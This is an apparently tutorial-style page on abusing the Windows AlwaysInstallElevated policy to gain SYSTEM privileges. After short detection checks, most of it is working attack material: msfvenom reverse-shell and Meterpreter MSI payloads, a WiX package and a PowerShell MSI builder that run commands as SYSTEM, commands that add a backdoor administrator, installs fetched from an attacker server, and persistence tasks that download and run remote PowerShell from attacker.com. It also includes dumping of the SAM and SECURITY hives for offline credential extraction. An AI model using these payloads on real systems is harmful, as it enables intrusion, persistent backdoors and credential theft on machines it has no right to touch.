Exploiting AlwaysInstallElevated
Understanding AlwaysInstallElevated
What Is AlwaysInstallElevated?
AlwaysInstallElevated is like handing out a valet key that starts any car to anyone who wants to "install software." Normally, installing software machine-wide requires administrative privileges: an administrator gets a UAC prompt, and a standard user cannot do it at all. When AlwaysInstallElevated is enabled, any user can install MSI packages, and the Windows Installer service carries out the install as NT AUTHORITY\SYSTEM with no prompt.
This Windows Group Policy setting was designed for environments where standard users need to install approved software without administrator intervention. It creates a significant security risk because the installer does not distinguish approved packages from any other: every MSI, including one the user wrote, is installed with the highest privileges on the system.
How AlwaysInstallElevated Works
Normal MSI Installation Process:
User attempts to install MSI package
Windows checks user privileges
If not administrator, UAC prompt appears
User must provide admin credentials
Installation proceeds with elevated privileges
With AlwaysInstallElevated Enabled:
User attempts to install MSI package
Windows automatically elevates to SYSTEM privileges
No UAC prompt or credential check
Installation proceeds with SYSTEM privileges immediately
Once the policy is in effect, who launches msiexec no longer limits what the package can do: a standard user installing an MSI locally gets its deferred custom actions executed by the Windows Installer service as NT AUTHORITY\SYSTEM, and no UAC prompt is involved because the service already runs as SYSTEM.
The Security Risk
When AlwaysInstallElevated is enabled, any user can:
Install malicious MSI packages with SYSTEM privileges
Bypass UAC completely for MSI installations
Gain immediate administrative access to the system
Execute any code during the installation process as SYSTEM
Registry Configuration
AlwaysInstallElevated requires specific registry settings to be enabled:
Required Registry Keys:
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
Why Both Keys Are Required:
HKLM key - written by the Computer Configuration half of the policy; enables it machine-wide
HKCU key - written by the User Configuration half of the policy; enables it for the current user
Both must be set to 1 for the policy to take effect; one hive alone is not exploitable
Requiring both values is the policy's only built-in safeguard, and it is a weak one: the same setting ("Always install with elevated privileges" under Administrative Templates > Windows Components > Windows Installer) exists in both Computer Configuration and User Configuration, and administrators who turn it on via Group Policy typically enable it in both places.
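Added example, not from the original page: a PowerShell helper that puts the weak configuration in place in a lab VM (both hives set to 1) or takes it out again as remediation, reading back the effective state each time. The function names are this example's own; writing the HKLM value needs an elevated prompt, and on a domain-joined host a GPO that sets the policy will re-apply it at the next refresh, so the real fix belongs in the GPO, not the local registry.

```powershell
# Added example (not from the original page): flip the policy on for a lab VM, or remove
# it as remediation, and read back the effective state. Function names are this example's own.
$AieKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AieState {
    # Exploitable only when BOTH hives carry AlwaysInstallElevated = 1
    $hives = foreach ($hive in 'HKLM', 'HKCU') {
        $v = Get-ItemProperty -Path "${hive}:\$AieKey" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{ Hive = $hive; Value = $v.AlwaysInstallElevated }   # $null when absent
    }
    [pscustomobject]@{
        Hives      = $hives
        Vulnerable = @($hives | Where-Object { $_.Value -eq 1 }).Count -eq 2
    }
}

function Set-AieLab {
    # Enable: the weak setting (both hives = 1). Disable: remove both values (the secure default).
    param([Parameter(Mandatory)][ValidateSet('Enable', 'Disable')][string]$State)
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$AieKey"
        if ($State -eq 'Enable') {
            New-Item -Path $path -Force | Out-Null          # creates the key chain if missing
            New-ItemProperty -Path $path -Name AlwaysInstallElevated -PropertyType DWord -Value 1 -Force | Out-Null
        } else {
            Remove-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        }
    }
    Get-AieState
}

# Usage (elevated prompt needed for the HKLM half):
#   Set-AieLab -State Enable     # Vulnerable: True
#   Set-AieLab -State Disable    # Vulnerable: False
```

Removing the values rather than setting them to 0 restores the "not configured" default that the reg query checks later on this page report as "key not found"; either is safe, since msiexec only elevates when both hives read 1.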
Real-World Scenarios
Where AlwaysInstallElevated Is Commonly Found:
Educational institutions - Allow students to install approved software
Corporate environments - Let employees install business applications
Kiosk systems - Enable automated software deployment
Development environments - Allow developers to install tools
Why It's Dangerous: Even in controlled environments, this setting can be abused because:
Any MSI file can be executed, not just approved ones
Users can create malicious MSI packages
Remote attackers who have gained a foothold as a standard user (phishing, a web shell, stolen credentials) can leverage this for privilege escalation
No validation of MSI package contents occurs
Detection and Enumeration
Manual Registry Checks
Basic Registry Enumeration
Check if AlwaysInstallElevated is enabled:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Understanding the output:
Value 0x1 (1) - AlwaysInstallElevated is enabled in that hive
Value 0x0 (0) - AlwaysInstallElevated is disabled in that hive
"ERROR: The system was unable to find the specified registry key or value" - Policy is not configured in that hive (disabled by default)
Only the combination matters: both queries must return 0x1 before msiexec will elevate; one hive alone is not exploitable
PowerShell registry check:
function Test-AlwaysInstallElevated {
    try {
        # Both policy values must be present and equal to 1; a missing value or 0 in
        # either hive means msiexec will not elevate
        $hklmValue = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
        $hkcuValue = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
        $hklmEnabled = $hklmValue.AlwaysInstallElevated -eq 1
        $hkcuEnabled = $hkcuValue.AlwaysInstallElevated -eq 1
        Write-Output "[+] AlwaysInstallElevated Check Results:"
        Write-Output "HKLM Setting: $(if($hklmEnabled){'Enabled'}else{'Disabled or Not Set'})"
        Write-Output "HKCU Setting: $(if($hkcuEnabled){'Enabled'}else{'Disabled or Not Set'})"
        if ($hklmEnabled -and $hkcuEnabled) {
            Write-Output "[!] VULNERABLE: AlwaysInstallElevated is enabled in both hives"
            return $true
        } else {
            Write-Output "[-] Not vulnerable: AlwaysInstallElevated is not enabled in both HKLM and HKCU"
            return $false
        }
    } catch {
        Write-Output "[-] Error checking AlwaysInstallElevated: $($_.Exception.Message)"
        return $false
    }
}
Test-AlwaysInstallElevated
Group Policy Verification
Check Group Policy settings:
# Produce an RSoP report and search it for the setting
gpresult /h gp_report.html
# Open gp_report.html and search for "Always install with elevated privileges"
# Command-line alternative. Note that /r only lists the names of applied GPOs, so filtering it
# for "installer" matches nothing unless a GPO happens to be named that way; /v prints the
# registry-based settings themselves (the computer half needs an elevated prompt)
gpresult /v | findstr /i "AlwaysInstallElevated"
PowerShell Group Policy check:
# Super-verbose RSoP for the current user and computer (computer scope needs elevation;
# the resulting errors are discarded)
$gpResult = gpresult /z 2>$null | Out-String
if ($gpResult -like "*AlwaysInstallElevated*") {
    Write-Output "[!] AlwaysInstallElevated found in Group Policy"
} else {
    # A locally set or script-set value will not show up here, so still check the registry
    Write-Output "[-] AlwaysInstallElevated not found in Group Policy"
}
Automated Detection Tools
PowerUp Detection
Using PowerUp framework:
Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated   # returns $True only when both hives are set to 1
# PowerUp also ships a ready-made package: Write-UserAddMSI writes UserAdd.msi to the
# current directory, and installing it pops a dialog that adds a new local administrator
Write-UserAddMSI
WinPEAS Detection
Using WinPEAS for detection:
winpeas.exe systeminfo | findstr /i "AlwaysInstallElevated"
winpeas.exe quiet | findstr /i "installer"
Metasploit Detection
Metasploit post-exploitation modules:
# From meterpreter session
meterpreter > background
# enum_applications only inventories installed software; it does not read the policy
msf > use post/windows/gather/enum_applications
msf > set SESSION 1
msf > run
# local_exploit_suggester runs the check() of the local exploit modules, including
# exploit/windows/local/always_install_elevated, and lists it when both keys are 1
msf > use post/multi/recon/local_exploit_suggester
msf > set SESSION 1
msf > run
Exploitation Techniques
Creating Malicious MSI Packages
Once AlwaysInstallElevated is confirmed, the next step is creating a malicious MSI package that will execute with SYSTEM privileges.
Method 1: Using MSFVenom
MSFVenom can generate malicious MSI packages directly:
Basic MSI payload generation:
# Generate reverse shell MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o malicious.msi
# Generate Meterpreter MSI
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o meterpreter.msi
# Generate command execution MSI. windows/exec hands the string to WinExec, not to a shell,
# so chained commands (&&) need an explicit cmd.exe /c; single quotes keep bash from
# touching the "!" in the password
msfvenom -p windows/exec CMD='cmd.exe /c net user hacker Password123! /add && net localgroup administrators hacker /add' -f msi -o adduser.msi
# msfvenom's MSI template runs the payload from a custom action and then deliberately fails
# the install so the product is never registered; install with /quiet or /qn so the
# resulting error dialog never shows
Advanced MSI payload with evasion:
# Encoded payload: x86/shikata_ga_nai will not encode an x64 payload (architecture mismatch),
# so use an x64 encoder, or switch to the x86 payload. The MSI wrapper msfvenom emits is
# itself well known to AV, so encoding the stager buys little on its own
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -e x64/xor_dynamic -i 3 -o encoded.msi
# HTTPS Meterpreter for encrypted communication
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f msi -o https_shell.msi
Method 2: PowerShell MSI Creation
PowerShell has no built-in cmdlet for authoring MSI files. The function below is the kind of "concept" wrapper that circulates in notes, and it is worth seeing what it actually produces: the here-string is Inno Setup script syntax ([Setup], [Files], [Run]), which the Inno compiler turns into a setup .exe, not an MSI. AlwaysInstallElevated only affects packages handled by the Windows Installer service, so such an installer would run as the user who launched it and gain nothing from the policy. Use msfvenom (Method 1) or the WiX Toolset (Method 3) for a real package.
Creating an installer script with PowerShell:
function New-MaliciousMSI {
    param(
        [string]$OutputPath = "$env:TEMP\malicious.iss",
        [string]$Command = "cmd.exe /c net user pwned Password123! /add"
    )
    # Writes an Inno Setup script; it is NOT an MSI and Windows Installer will never elevate it
    Write-Output "[+] Writing installer script..."
    Write-Output "Output: $OutputPath"
    Write-Output "Command: $Command"
    $issContent = @"
[Setup]
AppName=System Update
AppVersion=1.0
DefaultDirName={pf}\SystemUpdate
OutputBaseFilename=malicious
[Files]
Source: "payload.exe"; DestDir: "{app}"
[Run]
Filename: "cmd.exe"; Parameters: "/c $Command"; Flags: runhidden
"@
    Set-Content -Path $OutputPath -Value $issContent
    Write-Output "[!] MSI creation requires proper MSI authoring tools"
    Write-Output "[!] Use msfvenom or WiX Toolset for actual MSI generation"
}
Method 3: WiX Toolset MSI Creation
Using WiX Toolset (v3) for a custom MSI. Two details matter for the elevation: Execute="deferred" puts the action in the install script that the msiexec service executes, and Impersonate="no" makes the service run it as LocalSystem instead of the installing user. Note also that the XML declaration must be the first thing in the file (a comment before it breaks candle), that & in an attribute has to be written as &amp;, and that WiX requires a Directory (or Property) attribute alongside ExeCommand:
<?xml version="1.0" encoding="UTF-8"?>
<!-- malicious.wxs - WiX v3 source file; the UpgradeCode is a placeholder, generate your own GUID -->
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" Name="System Update" Language="1033" Version="1.0.0.0"
           Manufacturer="Microsoft Corporation" UpgradeCode="12345678-1234-1234-1234-123456789012">
    <Package InstallerVersion="200" Compressed="yes" InstallScope="perMachine" />
    <Media Id="1" Cabinet="media1.cab" EmbedCab="yes" />
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="SystemUpdate" />
      </Directory>
    </Directory>
    <ComponentGroup Id="ProductComponents" Directory="INSTALLLOCATION">
      <Component Id="MainComponent" Guid="*">
        <File Id="PayloadFile" Source="payload.exe" KeyPath="yes" />
      </Component>
    </ComponentGroup>
    <Feature Id="ProductFeature" Title="System Update" Level="1">
      <ComponentGroupRef Id="ProductComponents" />
    </Feature>
    <!-- Custom action: Directory is the working directory (required with ExeCommand),
         deferred + no impersonation = runs as SYSTEM from the install script;
         Return="ignore" keeps a non-zero exit code from rolling the install back -->
    <CustomAction Id="RunPayload"
                  Directory="TARGETDIR"
                  ExeCommand="cmd.exe /c net user hacker Password123! /add &amp;&amp; net localgroup administrators hacker /add"
                  Execute="deferred"
                  Impersonate="no"
                  Return="ignore" />
    <InstallExecuteSequence>
      <Custom Action="RunPayload" After="InstallFiles">NOT Installed</Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>
Compile WiX MSI:
# Compile the WiX source to MSI (payload.exe must exist next to the .wxs)
candle.exe malicious.wxs
light.exe malicious.wixobj -o malicious.msi
MSI Installation and Execution
Manual Installation
Install MSI package:
# Quiet installation: /quiet and /qn are equivalent (no UI at all), which also hides the
# deliberate "installation failed" dialog that msfvenom packages end with
msiexec /i malicious.msi /quiet
msiexec /i malicious.msi /qn
# Installation with verbose logging: shows the custom action firing, or a 1925
# "insufficient privileges" failure when the policy is not actually in effect
msiexec /i malicious.msi /qn /l*v install.log
PowerShell MSI installation:
# Install MSI using PowerShell
Start-Process "msiexec.exe" -ArgumentList "/i malicious.msi /qn" -Wait
# Alternative method
$msiFile = "C:\temp\malicious.msi"
$arguments = "/i `"$msiFile`" /qn"
Start-Process "msiexec.exe" -ArgumentList $arguments -Wait -NoNewWindow
Write-Output "[+] MSI installation completed"
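Added example, not from the original page or from any tool it names, serving both the PowerShell creation method (Method 2) and the manual installation steps above: it authors a minimal MSI with nothing but the Windows Installer COM API (WindowsInstaller.Installer, present on every Windows build, so neither WiX nor msfvenom is needed), installs it quietly with logging, and reads back proof of which account the custom action ran as. The package is kept to the bare tables Windows Installer needs. Paths, the product name, the 32-bit package template and the marker file are this example's own assumptions; the marker lives under C:\Users\Public so that a standard user can read what SYSTEM wrote.

```powershell
# Added example (not from the original page): build a custom-action-only MSI via the
# Windows Installer COM API, install it, and verify the action ran as SYSTEM.

function Invoke-ComMember {
    # PowerShell cannot call the Installer object's members directly; go through IDispatch.
    param($Object, [string]$Name, [System.Reflection.BindingFlags]$Flags, $Arguments)
    $Object.GetType().InvokeMember($Name, $Flags, $null, $Object, $Arguments)
}

function New-SystemCustomActionMsi {
    param(
        [Parameter(Mandatory)][string]$OutputPath,
        [Parameter(Mandatory)][string]$Command,   # run as "cmd.exe /c <Command>"; keep it under ~240 chars, no [ or ]
        [string]$ProductName = 'Lab Update'       # assumption: any name works
    )
    $call = [System.Reflection.BindingFlags]::InvokeMethod
    $get  = [System.Reflection.BindingFlags]::GetProperty
    $set  = [System.Reflection.BindingFlags]::SetProperty
    if (Test-Path $OutputPath) { Remove-Item $OutputPath -Force }

    $installer = New-Object -ComObject WindowsInstaller.Installer
    $db = Invoke-ComMember $installer 'OpenDatabase' $call @($OutputPath, 3)   # 3 = msiOpenDatabaseModeCreate

    $productCode = '{' + [guid]::NewGuid().ToString().ToUpper() + '}'
    $packageCode = '{' + [guid]::NewGuid().ToString().ToUpper() + '}'
    # Custom action type 3106 = 34 (EXE; full command line in Target, Source = working directory)
    #   + 1024 (deferred: executed from the install script inside the msiexec service)
    #   + 2048 (no impersonation: runs as LocalSystem instead of the user who ran msiexec)
    $target = ('cmd.exe /c ' + $Command) -replace "'", "''"   # escape quotes for installer SQL

    $statements = @(
        'CREATE TABLE `Property` (`Property` CHAR(72) NOT NULL, `Value` LONGCHAR NOT NULL LOCALIZABLE PRIMARY KEY `Property`)',
        'CREATE TABLE `Directory` (`Directory` CHAR(72) NOT NULL, `Directory_Parent` CHAR(72), `DefaultDir` CHAR(255) NOT NULL LOCALIZABLE PRIMARY KEY `Directory`)',
        'CREATE TABLE `CustomAction` (`Action` CHAR(72) NOT NULL, `Type` SHORT NOT NULL, `Source` CHAR(72), `Target` CHAR(255) PRIMARY KEY `Action`)',
        'CREATE TABLE `InstallExecuteSequence` (`Action` CHAR(72) NOT NULL, `Condition` CHAR(255), `Sequence` SHORT PRIMARY KEY `Action`)',
        ('INSERT INTO `Property` (`Property`, `Value`) VALUES (''ProductCode'', ''{0}'')' -f $productCode),
        ('INSERT INTO `Property` (`Property`, `Value`) VALUES (''ProductName'', ''{0}'')' -f $ProductName),
        'INSERT INTO `Property` (`Property`, `Value`) VALUES (''ProductVersion'', ''1.0.0'')',
        'INSERT INTO `Property` (`Property`, `Value`) VALUES (''ProductLanguage'', ''1033'')',
        'INSERT INTO `Property` (`Property`, `Value`) VALUES (''Manufacturer'', ''Lab'')',
        'INSERT INTO `Property` (`Property`, `Value`) VALUES (''ALLUSERS'', ''1'')',          # per-machine install
        'INSERT INTO `Directory` (`Directory`, `DefaultDir`) VALUES (''TARGETDIR'', ''SourceDir'')',
        ('INSERT INTO `CustomAction` (`Action`, `Type`, `Source`, `Target`) VALUES (''RunAsSystem'', 3106, ''TARGETDIR'', ''{0}'')' -f $target),
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''CostInitialize'', 800)',
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''FileCost'', 900)',
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''CostFinalize'', 1000)',
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''InstallValidate'', 1400)',
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''InstallInitialize'', 1500)',
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''RunAsSystem'', 1501)',   # deferred actions must sit between InstallInitialize and InstallFinalize
        'INSERT INTO `InstallExecuteSequence` (`Action`, `Sequence`) VALUES (''InstallFinalize'', 6600)'
    )
    foreach ($sql in $statements) {
        $view = Invoke-ComMember $db 'OpenView' $call @($sql)
        Invoke-ComMember $view 'Execute' $call $null | Out-Null
        Invoke-ComMember $view 'Close'   $call $null | Out-Null
    }

    # Summary information stream: msiexec refuses a package without Template/Revision/PageCount
    $si = Invoke-ComMember $db 'SummaryInformation' $get @(20)
    # 2 Title, 7 Template (32-bit package, en-US), 9 package code, 14 minimum Installer 2.0, 15 compressed source
    $summary = [ordered]@{ 2 = $ProductName; 7 = 'Intel;1033'; 9 = $packageCode; 14 = 200; 15 = 2 }
    foreach ($p in $summary.GetEnumerator()) {
        Invoke-ComMember $si 'Property' $set @($p.Key, $p.Value) | Out-Null
    }
    Invoke-ComMember $si 'Persist' $call $null | Out-Null
    Invoke-ComMember $db 'Commit'  $call $null | Out-Null
    foreach ($o in $si, $db, $installer) { [void][Runtime.InteropServices.Marshal]::ReleaseComObject($o) }
    return $OutputPath
}

function Test-MsiRunsAsSystem {
    param([Parameter(Mandatory)][string]$MsiPath, [Parameter(Mandatory)][string]$MarkerFile)
    if (Test-Path $MarkerFile) { Remove-Item $MarkerFile -Force }
    $log  = Join-Path $env:TEMP 'aie_install.log'
    $proc = Start-Process msiexec.exe -ArgumentList "/i `"$MsiPath`" /qn /l*v `"$log`"" -Wait -PassThru
    # Exit code 0 = installed; 1925 = "insufficient privileges for all users": the policy is
    # not in effect for this account, so nothing ran as SYSTEM
    $ranAs = if (Test-Path $MarkerFile) { (Get-Content $MarkerFile -Raw).Trim() } else { $null }
    [pscustomobject]@{ ExitCode = $proc.ExitCode; RanAs = $ranAs; Log = $log }
}

# Usage, as a standard user on a host where both policy values are 1:
$marker = Join-Path $env:PUBLIC 'aie_whoami.txt'
$msi = New-SystemCustomActionMsi -OutputPath (Join-Path $env:TEMP 'lab_update.msi') -Command "whoami > $marker"
Test-MsiRunsAsSystem -MsiPath $msi -MarkerFile $marker   # RanAs should read nt authority\system
```

The sequence table deliberately omits RegisterProduct and PublishProduct, so the product is never registered and nothing is left in Add/Remove Programs; the verbose log still records the custom action, which is also what a defender reviewing MsiInstaller events will see. The Target column is a Formatted string, so a command containing square brackets must escape them as [\[] and [\]].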
Remote MSI Installation
Install MSI from remote location:
# Install from a UNC path. The elevated install runs inside the Windows Installer service,
# which may reach the share as the computer account rather than as you, so the share must
# allow that (or anonymous access); if in doubt, copy the package locally first
msiexec /i "\\attacker-server\share\malicious.msi" /qn
# Install from HTTP: msiexec accepts URL sources and downloads the package itself, if outbound HTTP is allowed
msiexec /i "http://attacker-server/malicious.msi" /qn
PowerShell remote MSI:
# Download and install MSI
$msiUrl = "http://attacker-server/malicious.msi"
$localMsi = "$env:TEMP\update.msi"
try {
Invoke-WebRequest -Uri $msiUrl -OutFile $localMsi
Start-Process "msiexec.exe" -ArgumentList "/i `"$localMsi`" /qn" -Wait
Remove-Item $localMsi -Force
Write-Output "[+] Remote MSI installation completed"
} catch {
Write-Error "Failed to install remote MSI: $($_.Exception.Message)"
}
Metasploit Integration
Metasploit AlwaysInstallElevated Module
Using Metasploit's built-in module:
# Use the AlwaysInstallElevated exploit
use exploit/windows/local/always_install_elevated
# Set session (from existing session)
set SESSION 1
# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4443
# Execute exploit
exploit
Manual Metasploit MSI Deployment
Generate and deploy MSI via Meterpreter:
# From meterpreter session
meterpreter > upload malicious.msi C:\\temp\\update.msi
meterpreter > shell
# Install MSI from shell
C:\> msiexec /i C:\temp\update.msi /qn
# Exit shell and check for new session
meterpreter > background
msf > sessions -l
Advanced Exploitation Techniques
Persistence via MSI
Create MSI for persistence:
# MSI whose custom action (running as SYSTEM) registers a scheduled task; the task path is a
# placeholder. windows/exec hands the string to WinExec, and schtasks only understands double
# quotes, so do not wrap the task name or path in single quotes
msfvenom -p windows/exec CMD='schtasks /create /tn SystemUpdate /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM /f' -f msi -o persistence.msi
PowerShell persistence MSI:
# Build the task command on the attacker side (any PowerShell, pwsh on Linux included).
# -EncodedCommand sidesteps the nested quoting of WinExec, schtasks and PowerShell; the
# download URL is a placeholder. Keep the whole /tr value under schtasks' 261-character limit
$stage2  = 'IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
$persistenceCommand = "schtasks /create /tn WindowsOptimizer /tr `"powershell.exe -w hidden -enc $encoded`" /sc onlogon /ru SYSTEM /f"
$persistenceCommand
# Paste the printed string into msfvenom on the attacker host:
# msfvenom -p windows/exec CMD='<printed string>' -f msi -o persistence.msi
Credential Harvesting MSI
MSI for credential collection:
# MSI that saves the SAM, SECURITY and SYSTEM hives (readable only by SYSTEM) to a directory
# the low-privileged user can read back afterwards; the chained commands need cmd.exe /c
# because windows/exec calls WinExec rather than a shell
msfvenom -p windows/exec CMD='cmd.exe /c reg save HKLM\SAM C:\Users\Public\sam.hiv && reg save HKLM\SECURITY C:\Users\Public\security.hiv && reg save HKLM\SYSTEM C:\Users\Public\system.hiv' -f msi -o dumpcreds.msi
# Parse the three hives offline, e.g.: impacket-secretsdump -sam sam.hiv -security security.hiv -system system.hiv LOCAL